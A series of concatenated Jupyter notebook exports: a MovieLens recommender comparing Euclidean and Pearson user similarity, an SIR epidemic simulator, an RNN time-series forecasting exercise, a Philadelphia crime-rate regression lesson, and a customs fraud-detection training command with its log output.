self.resume_scores = self.resume_scores.sort_values("scores", ascending=False)
# save csv
filesManager.saveFromPandasToFile(self.resume_scores,'resume_scores.csv',';')
#self.resume_scores.to_csv(path + "resume_scores.csv", sep=";", encoding="utf-8")
def definingUserProfiles(self,path):
self.user_profiles=[]
self.user_id=[]
tac = time.time()
for i, userid in enumerate(self.ratings["userId"].unique()):
self.genres_counts = {g: 0 for g in self.genres}
self.user_id.append(userid)
self.reviews = self.ratings[self.ratings["userId"] == userid]
for j, review in self.reviews.iterrows():
movie_match = self.movies[self.movies["movieId"] == review["movieId"]]
for k, match in movie_match.iterrows():
for category in match["genres"].split("|"):
if category in self.genres:
self.genres_counts[category] += 1
self.user_profiles.append(self.genres_counts)
if i%500 == 0:
tic = time.time()
print("Profile number: ", i, userid, "time: ", tic-tac)
tac = tic
            # create only the first ~2000 profiles (the loop breaks at i > 2e+3)
if i>2e+3:
break
self.user_profiles_frame= pd.DataFrame()
self.user_profiles_frame["userId"] = self.user_id
total = [np.count_nonzero(self.ratings["userId"].values == id_) for id_ in self.user_id]
self.user_profiles_frame["total_reviews"] = total
for g in self.genres:
self.user_profiles_frame[g] = [profile[g]/total[i] for i,profile in enumerate(self.user_profiles)]
self.user_profiles_frame.to_csv(path+"user_profiles_frame.csv", sep=";", encoding="utf-8")
def calcularMedia(self,ranked_movies,ratings):
self.means = []
self.counts = []
tac = time.time()
for i, m_id in enumerate(ranked_movies["movieId"]):
            # select all ratings for this movieId
            selected = self.ratings[ratings["movieId"] == m_id]["rating"]
            # compute the mean
            self.means.append(selected.mean())
            # count the number of ratings
self.counts.append(len(selected))
if i%200 == 0:
tic = time.time()
print("Iteration: ", i, tic-tac)
tac = tic
self.ranked_movies["meanScore"] = self.means
self.ranked_movies["numRatings"] = self.counts
self.ranked_movies = self.ranked_movies.sort_values(["meanScore", "numRatings"], ascending=False)
self.ranked_movies["meanScore"] = self.ranked_movies["meanScore"].round(2)
def createHeatmap(self):
indexed = {g: self.genres.index(g) for g in self.genres}
dims = len(self.genres)
self.relations = np.zeros((dims, dims))
for i, movie in self.movies.iterrows():
cats = movie["genres"].split("|")
# increase positions by 1
for cat in cats:
for cat_ in cats:
                    # the exact quantity we add doesn't matter; we can rescale
                    # later. A small value keeps this step fast
self.relations[indexed[cat], indexed[cat_]] += 1e-2
path = '/content/drive/'
print("**************************","Opennig files and loading data...","***********************",sep="\n")
from google.colab import drive
drive.mount(path)
path+='My Drive/'
filesManager=FilesManager(path)
print("**************************","Creating data structure...","***********************",sep="\n")
datos=Datos()
datos.importData(path,filesManager,'ratings.csv','movies.csv')
datos.loadRankedMovies()
print("**************************","Operatinng with data..","***********************",sep="\n")
datos.getRankedMovies().head()
datos.calcularMedia(datos.getRankedMovies(),datos.getRatings())
datos.getRankedMovies().to_csv(path+"top_scored_movies.csv", sep=";", encoding="utf-8")
datos.getRankedMovies().head(10)
print("**************************","Clasification...","***********************",sep="\n")
datos.loadGenres(filesManager)
datos.definingUserProfiles(path)
datos.createHeatmap()
graficos=Graficos(datos,filesManager)
graficos.createPlot(path)
graficos.getPlot().show()
graficos.getUserProfiles().head()
from abc import ABC, abstractmethod
class Recommendation:
    def __init__(self):
        pass
class Distance(ABC):
    def __init__(self):
        pass
    @abstractmethod
    def calculateDistance(self, userProfiles):
        pass
import math as m
class EuclideanDistance(Distance):
    def __init__(self):
        Distance.__init__(self)
    def calculateDistance(self, userProfiles):
        # satisfy the abstract interface; default to the NumPy implementation
        return self.calculateDistanceNumpy(userProfiles)
def calculateDistanceMath(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
columnsSum=0
for column in userProfiles.columns:
columnsSum+=(row[column]-nextrow[column])**2
                dist[-1].append(m.sqrt(columnsSum))
return dist
def calculateDistanceNumpy(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
                dist[-1].append(np.linalg.norm(row.iloc[:] - nextrow.iloc[:]))
return dist
import math as m
class PearsonDistance(Distance):
    def __init__(self):
        Distance.__init__(self)
    def calculateDistance(self, userProfiles):
        return self.calculateDistanceScipy(userProfiles)
def calculateDistanceMath(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
                dist[-1].append(self.correlation(row, nextrow))
return dist
    def calculateDistanceScipy(self, userProfiles):
        # despite the name, this uses NumPy's corrcoef rather than SciPy
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
                dist[-1].append(np.corrcoef(row.iloc[:], nextrow.iloc[:])[0, 1])
return dist
def mean(self,list1):
total = 0
for a in list1:
total += float(a)
mean = total/len(list1)
return mean
    def standarDev(self, list1):
        # root of the summed squared deviations (unnormalized); the missing
        # 1/n factors cancel in the correlation ratio
listMean = self.mean(list1)
dev = 0.0
for i in range(len(list1)):
dev += (list1[i]-listMean)**2
dev = dev**(1/2.0)
return dev
def correlation(self,list1, list2):
xMean = self.mean(list1)
yMean = self.mean(list2)
xStandarDev = self.standarDev(list1)
yStandarDev = self.standarDev(list2)
rNumerator = 0.0
for i in range(len(list1)):
rNumerator += (list1[i]-xMean)*(list2[i]-yMean)
rDenominator = xStandarDev * yStandarDev
r = rNumerator/rDenominator
return r
user_profiles = filesManager.readFileToPandas('user_profiles_frame.csv',';',True);
user_profiles = user_profiles.rename(columns = {'Unnamed: 0':'Index'})
user_profiles = user_profiles.drop(['(no genres listed)', 'Index'], axis = 1)
user_profiles = user_profiles.round(2)
user_profiles = user_profiles.set_index(['userId'])
user_profiles = user_profiles.drop(columns=['total_reviews'])
distanceEuclidean=EuclideanDistance()
distancePearson=PearsonDistance()
user_profiles=user_profiles[:10]
print("********* Similarity between User by ranked generes ******************")
print("********* Euclidean Distance Mathematical calculation*****************")
print(pd.DataFrame(distanceEuclidean.calculateDistanceMath(user_profiles)))
print("********* Euclidean Distance Numpy Calculation **********************")
euclideanDistanceDataFrame=pd.DataFrame(distanceEuclidean.calculateDistanceNumpy(user_profiles))
euclideanDistanceDataFrame=euclideanDistanceDataFrame.replace({ 0:np.nan})
print(euclideanDistanceDataFrame)
print("***********************************************************************")
print("***********************************************************************")
print("***********************************************************************")
print("********** Pearson Correlation Mathematical calculation ************")
print(pd.DataFrame(distancePearson.calculateDistanceMath(user_profiles)))
print("********** Pearson Correlation Scipy calculation ************")
pearsonDistanceDataFrame=pd.DataFrame(distancePearson.calculateDistanceScipy(user_profiles))
pearsonDistanceDataFrame=pearsonDistanceDataFrame.replace({ 1:np.nan})
print(pearsonDistanceDataFrame)
# distance
euclideanDistanceDataFrame["min"]=euclideanDistanceDataFrame.min(axis=1)
euclideanDistanceDataFrame["min_id"]=euclideanDistanceDataFrame.idxmin(axis=1)
print(euclideanDistanceDataFrame)
pearsonDistanceDataFrame["max"]=pearsonDistanceDataFrame.max(axis=1)
pearsonDistanceDataFrame["max_id"]=pearsonDistanceDataFrame.idxmax(axis=1)
print(pearsonDistanceDataFrame)
userId = int(input("Enter your userId [1-10]: "))
columnMin = euclideanDistanceDataFrame.iloc[userId-1]["min_id"]
# ratings of the most similar user (column indices are 0-based, userIds start at 1)
filmsRecomendedForUser = datos.ratings.loc[datos.ratings['userId'] == columnMin+1]
filmsUserViewed = datos.ratings.loc[datos.ratings['userId'] == userId]
moviesFromUser = datos.movies.loc[datos.movies['movieId'].isin(filmsRecomendedForUser['movieId'])]
viewedMovies = datos.movies.loc[datos.movies['movieId'].isin(filmsUserViewed['movieId'])]
finalRecomendation = moviesFromUser[~moviesFromUser['movieId'].isin(viewedMovies['movieId'])]
finalRecomendation = finalRecomendation.dropna()
print("*********************** Recommendations from user:", int(columnMin), " To user:", userId, "**************")
print(finalRecomendation[['title', 'genres']])
print()
columnMax = pearsonDistanceDataFrame.iloc[userId-1]["max_id"]
filmsRecomendedForUser = datos.ratings.loc[datos.ratings['userId'] == columnMax+1]
filmsUserViewed = datos.ratings.loc[datos.ratings['userId'] == userId]
moviesFromUser = datos.movies.loc[datos.movies['movieId'].isin(filmsRecomendedForUser['movieId'])]
viewedMovies = datos.movies.loc[datos.movies['movieId'].isin(filmsUserViewed['movieId'])]
finalRecomendation = moviesFromUser[~moviesFromUser['movieId'].isin(viewedMovies['movieId'])]
finalRecomendation = finalRecomendation.dropna()
print("*********************** Recommendations from user:", int(columnMax), " To user:", userId, "**************")
print(finalRecomendation[['title', 'genres']])
print()
###Output
*********************** Recommendations from user: 5 To user: 8 **************
title genres
1 Jumanji (1995) Adventure|Children|Fantasy
2 Grumpier Old Men (1995) Comedy|Romance
4 Father of the Bride Part II (1995) Comedy
5 Heat (1995) Action|Crime|Thriller
6 Sabrina (1995) Comedy|Romance
.. ... ...
811 Sleepers (1996) Thriller
812 Aladdin and the King of Thieves (1996) Animation|Children|Comedy|Fantasy|Musical|Romance
815 Willy Wonka & the Chocolate Factory (1971) Children|Comedy|Fantasy|Musical
822 Candidate, The (1972) Drama
824 Bonnie and Clyde (1967) Crime|Drama
[312 rows x 2 columns]
|
.ipynb_checkpoints/Simulator-checkpoint.ipynb | ###Markdown
The model we initially considered is the Susceptible-Infected-Recovered (SIR) model. A slight generalization of it is the Susceptible-Exposed-Infected-Recovered (SEIR) model. Since there is enough information available about the incubation period of Covid-19, it may be worth implementing both. Starting with SIR, the dynamic equations are given by:$$\dot{S} = -\frac{\beta}{N} SI \\\dot{I} = \frac{\beta}{N} SI - \gamma I \\\dot{R} = \gamma I \\S + I + R = N$$where $R_0 = \beta/\gamma$ is the basic reproduction number of the virus. For a discrete-time model a forward Euler integration should suffice. We introduce the SIR class for an easier API. The following objects can be used for the evolution of the population within a single cell of the population.
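A minimal forward-Euler discretization with a one-day time step (this is what the `integrate` methods below implement, with $\Delta t = 1$):$$S_{t+1} = S_t - \frac{\beta}{N} S_t I_t \,\Delta t \\I_{t+1} = I_t + \Big(\frac{\beta}{N} S_t I_t - \gamma I_t\Big)\Delta t \\R_{t+1} = R_t + \gamma I_t \,\Delta t$$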
###Code
class CompartmentManager(object):
"""Supposed to take care of arbitrary many cells once implemented"""
def __init__(self):
pass
class SRI(object):
def __init__(self, beta=0.2, gamma=0.5, S0=999, I0=1, R0=0):
self.S0 = S0
self.I0 = I0
self.R0 = R0
self.beta = beta
self.gamma = gamma
self.reset()
self.N = S0 + I0 + R0
def increments(self, other=None, link=0.1):
I = self.currentI if other is None else self.currentI + link*other.currentI
deltaS = -self.beta*self.currentS*I/self.N
deltaR = self.gamma*self.currentI
deltaI = -deltaS - deltaR
return (deltaS, deltaI, deltaR)
    def integrate(self):
        # implemented by the deterministic/stochastic subclasses below
        raise NotImplementedError
    def evolve(self, days, progress=False):
        if progress:
            from tqdm import tqdm  # optional progress bar
            for i in tqdm(range(days)):
                self.integrate()
        else:
            for i in range(days):
                self.integrate()
def reset(self):
self._S = [self.S0]
self._I = [self.I0]
self._R = [self.R0]
@property
def currentS(self):
return self._S[-1]
@property
def currentI(self):
return self._I[-1]
@property
def currentR(self):
return self._R[-1]
@property
def time_elapsed(self):
return len(self.S)
@property
def time(self):
return np.arange(self.time_elapsed)
@property
def S(self):
return np.array(self._S)
@property
def I(self):
return np.array(self._I)
@property
def R(self):
return np.array(self._R)
class DeterministicSRI(SRI):
def __init__(self, **kargs):
super().__init__(**kargs)
def integrate(self, other=None, link=0.1):
(deltaS, deltaI, deltaR) = self.increments(other=other, link=link)
newS = self.currentS + deltaS
newI = self.currentI + deltaI
newR = self.currentR + deltaR
self._S.append(newS)
self._I.append(newI)
self._R.append(newR)
class StochasticSRI(SRI):
def __init__(self, **kargs):
super().__init__(**kargs)
def integrate(self, other=None, link=0.1):
(deltaS, deltaI, deltaR) = self.increments(other=other, link=link)
jumpS = -min(np.random.poisson(lam=np.abs(deltaS)), self.currentS)
jumpR = min(np.random.poisson(lam=np.abs(deltaR)), self.currentI)
jumpI = -(jumpS + jumpR)
newS = self.currentS + jumpS
newI = self.currentI + jumpI
newR = self.currentR + jumpR
self._S.append(newS)
self._I.append(newI)
self._R.append(newR)
# example use
params = {'beta' : 0.5, 'gamma' : 0.3, 'S0' : 999, 'I0' : 1, 'R0' : 0}
model1 = DeterministicSRI(**params)
model1.evolve(days=100)
model2 = StochasticSRI(**params)
model2.evolve(days=100)
xlabel = 'Days'
ylabel1 = 'Deterministic'
ylabel2 = 'Stochastic'
fig = plt.figure(figsize=(8,8))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(model1.time, model1.S, linewidth=2, label='Susceptible')
ax1.plot(model1.time, model1.I, linewidth=2, label='Infected')
ax1.plot(model1.time, model1.R, linewidth=2, label='Recovered')
ax2.plot(model2.time, model2.S, linewidth=2, label='Susceptible')
ax2.plot(model2.time, model2.I, linewidth=2, label='Infected')
ax2.plot(model2.time, model2.R, linewidth=2, label='Recovered')
set_ax(ax1, ylabel=ylabel1, legend=True)
set_ax(ax2, xlabel=xlabel, ylabel=ylabel2, legend=True)
plt.show()
# interacting cells
params2 = {'beta' : 0.5, 'gamma' : 0.3, 'S0' : 1000, 'I0' : 0, 'R0' : 0}
cell1 = DeterministicSRI(**params)
cell2 = DeterministicSRI(**params2)
link = 0.000001
days = 500
for i in range(days):
cell1.integrate(other=cell2, link=link)
cell2.integrate(other=cell1, link=link)
xlabel = 'Days'
ylabel1 = 'Cell1'
ylabel2 = 'Cell2'
fig = plt.figure(figsize=(8,8))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(cell1.time, cell1.S, linewidth=2, label='Susceptible')
ax1.plot(cell1.time, cell1.I, linewidth=2, label='Infected')
ax1.plot(cell1.time, cell1.R, linewidth=2, label='Recovered')
ax2.plot(cell2.time, cell2.S, linewidth=2, label='Susceptible')
ax2.plot(cell2.time, cell2.I, linewidth=2, label='Infected')
ax2.plot(cell2.time, cell2.R, linewidth=2, label='Recovered')
set_ax(ax1, ylabel=ylabel1, legend=True)
set_ax(ax2, xlabel=xlabel, ylabel=ylabel2, legend=True)
plt.show()
###Output
_____no_output_____ |
Time_Series_Data_Prediction_Using_RNN.ipynb | ###Markdown
###Code
!pip install tf-nightly-2.0-preview
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.4,
np.cos(season_time * 2 * np.pi),
1 / np.exp(3 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
plot_series(time,series,format='-')
split_time = 1000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
window_size = 20
batch_size = 32
shuffle_buffer_size = 1000
def windowed_dataset(series, window_size, batch_size, shuffle_buffer):
    dataset = tf.data.Dataset.from_tensor_slices(series)
    # slide a window of window_size inputs plus one target over the series
    dataset = dataset.window(size=window_size+1, shift=1, drop_remainder=True)
    dataset = dataset.flat_map(lambda window: window.batch(window_size+1))
    # split each window into (features, label)
    dataset = dataset.map(lambda window: (window[:-1], window[-1:]))
    dataset = dataset.shuffle(shuffle_buffer)
    dataset = dataset.batch(batch_size).prefetch(1)
    return dataset
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
train_set = windowed_dataset(x_train, window_size, batch_size=128, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
tf.keras.layers.Lambda(lambda x: tf.expand_dims(x, axis=-1),
input_shape=[None]),
tf.keras.layers.SimpleRNN(40, return_sequences=True),
tf.keras.layers.SimpleRNN(40),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x * 100.0)
])
lr_schedule = tf.keras.callbacks.LearningRateScheduler(lambda epoch: 1e-8*10**(epoch/20))
optimizer = tf.keras.optimizers.SGD(lr=1e-8, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(train_set, epochs=100, callbacks=[lr_schedule])
plt.semilogx(history.history["lr"], history.history["loss"])
plt.axis([1e-8, 1e-4, 0, 30])
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
dataset = windowed_dataset(x_train, window_size, batch_size=128, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
tf.keras.layers.Lambda(lambda x:tf.expand_dims(x,-1),input_shape=[None]),
tf.keras.layers.SimpleRNN(40,return_sequences=True),
tf.keras.layers.SimpleRNN(40),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x*100.0)
])
optimizer = tf.keras.optimizers.SGD(lr=5e-6, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(dataset,epochs=400)
forecast=[]
for t in range(len(series) - window_size):
    forecast.append(model.predict(series[t:t + window_size][np.newaxis]))
forecast = forecast[split_time-window_size:]
results = np.array(forecast)[:, 0, 0]
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, results)
tf.keras.metrics.mean_absolute_error(x_valid, results).numpy()
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
mae=history.history['mae']
loss=history.history['loss']
epochs=range(len(loss)) # Get number of epochs
#------------------------------------------------
# Plot MAE and Loss
#------------------------------------------------
plt.plot(epochs, mae, 'r')
plt.plot(epochs, loss, 'b')
plt.title('MAE and Loss')
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
plt.legend(["MAE", "Loss"])
plt.figure()
epochs_zoom = epochs[200:]
mae_zoom = mae[200:]
loss_zoom = loss[200:]
#------------------------------------------------
# Plot Zoomed MAE and Loss
#------------------------------------------------
plt.plot(epochs_zoom, mae_zoom, 'r')
plt.plot(epochs_zoom, loss_zoom, 'b')
plt.title('MAE and Loss')
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
plt.legend(["MAE", "Loss"])
plt.figure()
###Output
_____no_output_____ |
regression_mooc/notebooks/PhillyCrime.ipynb | ###Markdown
Load some house value vs. crime rate data Dataset is from Philadelphia, PA and includes average house sales price in a number of neighborhoods. The attributes of each neighborhood we have include the crime rate ('CrimeRate'), miles from Center City ('MilesPhila'), town name ('Name'), and county name ('County').
###Code
sales = pd.read_csv('https://courses.cs.washington.edu/courses/cse416/18sp/notebooks/Philadelphia_Crime_Rate_noNA.csv')
sales.head()
###Output
_____no_output_____
###Markdown
Exploring the data The house price in a town is correlated with the crime rate of that town. Low crime towns tend to be associated with higher house prices and vice versa.
###Code
sales.plot.scatter(x="CrimeRate", y="HousePrice")
###Output
_____no_output_____
###Markdown
Fit the regression model using crime as the feature
###Code
features = sales["CrimeRate"].to_numpy().reshape(-1, 1)
target = sales["HousePrice"].to_numpy().reshape(-1, 1)
crime_model = LinearRegression()
regression = crime_model.fit(features, target)
print(f"coeficients: {regression.coef_}")
print(f"intercept: {regression.intercept_}")
crime_model.predict(features[0].reshape(-1, 1))
###Output
_____no_output_____
###Markdown
Let's see what our fit looks like Matplotlib is a Python plotting library that is useful for visualizing fits like this one. You can install it with: 'pip install matplotlib'
###Code
plt.plot(sales['CrimeRate'],sales['HousePrice'],'.',
sales['CrimeRate'], crime_model.predict(features),'-')
###Output
_____no_output_____
###Markdown
Above: blue dots are the original data, and the orange line is the fit from the simple regression. Remove Center City and redo the analysis Center City is the one observation with an extremely high crime rate, yet house prices are not very low. This point does not follow the trend of the rest of the data very well. A question is how much including Center City is influencing our fit on the other datapoints. Let's remove this datapoint and see what happens.
###Code
sales_noCC = sales[sales['MilesPhila'] != 0.0]
sales_noCC.plot.scatter(x="CrimeRate", y="HousePrice")
###Output
_____no_output_____
###Markdown
Refit our simple regression model on this modified dataset:
###Code
features_noCC = sales_noCC["CrimeRate"].to_numpy().reshape(-1, 1)
target_noCC = sales_noCC["HousePrice"].to_numpy().reshape(-1, 1)
crime_model_noCC = LinearRegression()
regression_noCC = crime_model_noCC.fit(features_noCC, target_noCC)
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
###Output
coefficients: [[-2288.68942995]]
intercept: [225233.551839]
###Markdown
Look at the fit:
###Code
plt.plot(sales_noCC['CrimeRate'], sales_noCC['HousePrice'], '.',
sales_noCC['CrimeRate'], crime_model_noCC.predict(features_noCC), '-')
###Output
_____no_output_____
###Markdown
Compare coefficients for full-data fit versus no-Center-City fit Visually, the fit seems different, but let's quantify this by examining the estimated coefficients of our original fit and that of the modified dataset with Center City removed.
###Code
print(f"coeficients: {regression.coef_}")
print(f"intercept: {regression.intercept_}")
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
###Output
coefficients: [[-2288.68942995]]
intercept: [225233.551839]
###Markdown
Above: We see that for the "no Center City" version, per unit increase in crime, the predicted decrease in house prices is 2,288. In contrast, for the original dataset, the drop is only 576 per unit increase in crime. This is significantly different! High leverage points: Center City is said to be a "high leverage" point because it is at an extreme x value where there are no other observations. As a result, recalling the closed-form solution for simple regression, this point has the *potential* to dramatically change the least squares line, since the center of x mass is heavily influenced by this one point and the least squares line will try to fit close to that outlying (in x) point. If a high leverage point follows the trend of the other data, this might not have much effect. On the other hand, if this point somehow differs, it can be strongly influential in the resulting fit. Influential observations: An influential observation is one where the removal of the point significantly changes the fit. As discussed above, high leverage points are good candidates for being influential observations, but need not be. Other observations that are *not* leverage points can also be influential observations (e.g., strongly outlying in y even if x is a typical value). Plotting the two models Confirm the above calculations by looking at the plots. The orange line is the model trained on all the data, and the green line is the model trained with Center City removed. Notice how much steeper the green line is, since the drop in value per unit of crime is much higher according to this model.
###Code
plt.plot(sales_noCC['CrimeRate'], sales_noCC['HousePrice'], '.',
sales_noCC['CrimeRate'], crime_model.predict(features_noCC), '-',
sales_noCC['CrimeRate'], crime_model_noCC.predict(features_noCC), '-')
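# Illustrative sketch (added, not from the original notebook): leverage
# quantifies how extreme each x value is. For simple regression,
#   h_i = 1/n + (x_i - x_mean)^2 / sum_j (x_j - x_mean)^2,
# so Center City's extreme crime rate should give it by far the largest h_i.
# (Uses the 'Name' column described in the intro above.)
x = sales['CrimeRate']
leverage = 1/len(x) + (x - x.mean())**2 / ((x - x.mean())**2).sum()
print(sales.loc[leverage.idxmax(), ['Name', 'CrimeRate']])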
###Output
_____no_output_____
###Markdown
Remove high-value outlier neighborhoods and redo analysis Based on the discussion above, a question is whether the outlying high-value towns are strongly influencing the fit. Let's remove them and see what happens.
###Code
# sales_nohighend = sales_noCC[sales_noCC['HousePrice'] < 350000]
# crime_model_nohighend = turicreate.linear_regression.create(
# sales_nohighend,
# target='HousePrice',
# features=['CrimeRate'],
# validation_set=None,
# verbose=False
# )
sales_noHE = sales_noCC[sales_noCC['HousePrice'] < 350000]
features_noHE = sales_noHE["CrimeRate"].to_numpy().reshape(-1, 1)
target_noHE = sales_noHE["HousePrice"].to_numpy().reshape(-1, 1)
crime_model_noHE = LinearRegression()
regression_noHE= crime_model_noHE.fit(features_noHE, target_noHE)
###Output
_____no_output_____
###Markdown
Do the coefficients change much?
###Code
print(f"coeficients: {regression_noCC.coef_}")
print(f"intercept: {regression_noCC.intercept_}")
print(f"coeficients: {regression_noHE.coef_}")
print(f"intercept: {regression_noHE.intercept_}")
###Output
coefficients: [[-1838.56264859]]
intercept: [199098.8526698]
###Markdown
Above: We see that removing the outlying high-value neighborhoods has *some* effect on the fit, but not nearly as much as our high-leverage Center City datapoint. Compare the two models Confirm the above calculations by looking at the plots. The orange line is the no high-end model, and the green line is the no-city-center model.
###Code
plt.plot(sales_noHE['CrimeRate'], sales_noHE['HousePrice'], '.',
sales_noHE['CrimeRate'], crime_model_noHE.predict(features_noHE), '-',
sales_noHE['CrimeRate'], crime_model_noCC.predict(features_noHE), '-')
###Output
_____no_output_____ |
analysis/POT_regression_analysis.ipynb | ###Markdown
First, run the command below to get the embeddings for the upcoming weeks. We also save this model (it is used both to learn the embeddings and as the first model of the simulation). This model will then be used to generate embeddings for all upcoming weeks.
###Code
day = 20160701
! export CUDA_VISIBLE_DEVICES=3 && python main.py --data real-t --semi_supervised 0 --batch_size 128 --sampling hybrid --subsamplings bATE/DATE --weights 0/1 --mode scratch --train_from 20160101 --test_from $day --test_length 350 --valid_length 30 --initial_inspection_rate 20 --final_inspection_rate 5 --epoch 5 --closs bce --rloss full --save 0 --numweeks 1 --inspection_plan direct_decay
###Output
Experiment starts: 1627093784.306
Namespace(act='relu', ada_lr=0.8, agg='sum', alpha=10, batch_size=128, closs='bce', data='real-t', device='0', devices=['0', '1', '2', '3'], dim=16, epoch=5, final_inspection_rate=5.0, fusion='concat', head_num=4, identifier='1627093784.306', initial_inspection_rate=20.0, inspection_plan='direct_decay', l2=0.01, lr=0.005, mode='scratch', numweeks=1, output='result-1627093784.306', rev_func='log', rloss='full', sampling='hybrid', save=0, semi_supervised=0, ssl_strategy='random', subsamplings='bATE/DATE', test_from='20160701', test_length=350, train_from='20160101', uncertainty='naive', use_self=1, valid_length=30, weights='0/1')
Before masking:
0 373394
1 28939
Name: illicit, dtype: int64
NumExpr defaulting to 6 threads.
After masking:
0.0 74643
1.0 5824
Name: illicit, dtype: int64
Inspection rate for testing periods: [5.]
Data size:
Train labeled: (80467, 41), Train unlabeled: (321866, 41), Valid labeled: (69932, 41), Valid unlabeled: (0, 13), Test: (857886, 41)
Checking label distribution
Training: 0.0780247310531463
Validation: 0.09654253234025872
Testing: 0.08409417455730098
Test episode: #0, Current inspection rate: 5.0
(80467, 41), (857886, 41)
<Hybrid> Querying 42894 (=100.0%) items using the <query_strategies.DATE.DATESampling object at 0x2b997e445898> subsampler
Training XGBoost model...
[11:31:02] WARNING: /tmp/build/80754af9/xgboost-split_1619724447847/work/src/learner.cc:1061: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.
Mode: scratch, Episode: 0
Ranger optimizer loaded.
Gradient Centralization usage = True
GC applied to both conv and fc layers
Training DATE model ...
------------
Validate at epoch 1
CLS loss: 0.3298, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5619, Recall: 0.3191, Revenue: 0.4094
Overall F1:0.4202, AUC:0.6869, F1-top:0.4856
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 2
CLS loss: 0.3531, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5633, Recall: 0.3200, Revenue: 0.4181
Overall F1:0.4261, AUC:0.7444, F1-top:0.4907
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 3
CLS loss: 0.4252, REG loss: 0.0269
Checking top 5% suspicious transactions: 3497
Precision: 0.5342, Recall: 0.3034, Revenue: 0.3893
Overall F1:0.3978, AUC:0.7231, F1-top:0.4617
------------
Validate at epoch 4
CLS loss: 0.4563, REG loss: 0.0271
Checking top 5% suspicious transactions: 3497
Precision: 0.5325, Recall: 0.3024, Revenue: 0.3894
Overall F1:0.3976, AUC:0.7254, F1-top:0.4609
------------
Validate at epoch 5
CLS loss: 0.4940, REG loss: 0.0269
Checking top 5% suspicious transactions: 3497
Precision: 0.5093, Recall: 0.2893, Revenue: 0.3716
Overall F1:0.3684, AUC:0.7130, F1-top:0.4404
Early stopping...
--------Evaluating DATE model---------
CLS loss: 0.3531, REG loss: 0.0257
CLS loss: 0.3365, REG loss: 0.0250
Checking top 5% suspicious transactions: 42895
Precision: 0.4363, Recall: 0.2812, Revenue: 0.3427
CLS loss: 0.3365, REG loss: 0.0250
Training XGBoost model...
[11:45:56] WARNING: /tmp/build/80754af9/xgboost-split_1619724447847/work/src/learner.cc:1061: Starting in XGBoost 1.3.0, the default evaluation metric used with the objective 'binary:logistic' was changed from 'error' to 'logloss'. Explicitly set eval_metric if you'd like to restore the old behavior.
Mode: scratch, Episode: 0
Ranger optimizer loaded.
Gradient Centralization usage = True
GC applied to both conv and fc layers
Training DATE model ...
------------
Validate at epoch 1
CLS loss: 0.3001, REG loss: 0.0256
Checking top 5% suspicious transactions: 3497
Precision: 0.5765, Recall: 0.3274, Revenue: 0.4319
Overall F1:0.4448, AUC:0.7602, F1-top:0.5042
/home/intern/kien/Customs-Fraud-Detection/intermediary/saved_models/DATE-1627093784.306.pkl
------------
Validate at epoch 2
CLS loss: 0.3344, REG loss: 0.0257
Checking top 5% suspicious transactions: 3497
Precision: 0.5573, Recall: 0.3166, Revenue: 0.4189
Overall F1:0.4268, AUC:0.7399, F1-top:0.4881
------------
Validate at epoch 3
CLS loss: 0.3973, REG loss: 0.0266
Checking top 5% suspicious transactions: 3497
Precision: 0.5479, Recall: 0.3112, Revenue: 0.4058
Overall F1:0.4105, AUC:0.7376, F1-top:0.4768
------------
Validate at epoch 4
CLS loss: 0.4274, REG loss: 0.0279
Checking top 5% suspicious transactions: 3497
Precision: 0.5413, Recall: 0.3075, Revenue: 0.4013
